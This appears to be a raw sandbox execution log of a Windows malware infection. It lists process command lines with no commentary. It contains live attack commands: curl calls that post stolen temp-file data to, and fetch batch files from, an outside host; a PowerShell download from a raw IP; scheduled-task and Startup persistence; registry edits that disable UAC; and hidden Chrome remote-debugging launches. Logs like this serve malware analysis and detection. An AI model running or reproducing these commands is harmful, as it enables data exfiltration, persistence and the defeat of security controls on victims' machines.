"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe" && pause

C:\Users\Admin\Desktop\Files\pp.exe

"C:\Users\Admin\Desktop\Files\pp.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2332,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2328 /prefetch:2

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1784,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2368 /prefetch:3

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1876,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2592 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4532 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7444 -ip 7444

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 1268

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\twztl.exe

"C:\Users\Admin\Desktop\Files\twztl.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\Desktop\Files\pornhub_downloader.exe

"C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C2D.tmp\7C2E.tmp\7C2F.bat C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe"

C:\Users\Admin\Desktop\Files\PORNHU~1.EXE

"C:\Users\Admin\Desktop\Files\PORNHU~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8043.tmp\8044.tmp\8045.bat C:\Users\Admin\Desktop\Files\PORNHU~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ffcc21146f8,0x7ffcc2114708,0x7ffcc2114718

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Users\Admin\Desktop\Files\seksiak.exe

"C:\Users\Admin\Desktop\Files\seksiak.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Setup.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Setup.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\2568621829.exe

C:\Users\Admin\AppData\Local\Temp\2568621829.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Local\Temp\1487223240.exe

C:\Users\Admin\AppData\Local\Temp\1487223240.exe

C:\Users\Admin\AppData\Local\Temp\3020718451.exe

C:\Users\Admin\AppData\Local\Temp\3020718451.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Desktop\Files\frap.exe

"C:\Users\Admin\Desktop\Files\frap.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10332 -ip 10332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10332 -s 768

C:\Users\Admin\Desktop\Files\newfile.exe

"C:\Users\Admin\Desktop\Files\newfile.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\202579613.exe

C:\Users\Admin\AppData\Local\Temp\202579613.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 7640 -ip 7640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1292

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4i790k.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4i790k.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\torque.exe

"C:\Users\Admin\Desktop\Files\torque.exe"

C:\Users\Admin\Desktop\Files\14082024.exe

"C:\Users\Admin\Desktop\Files\14082024.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

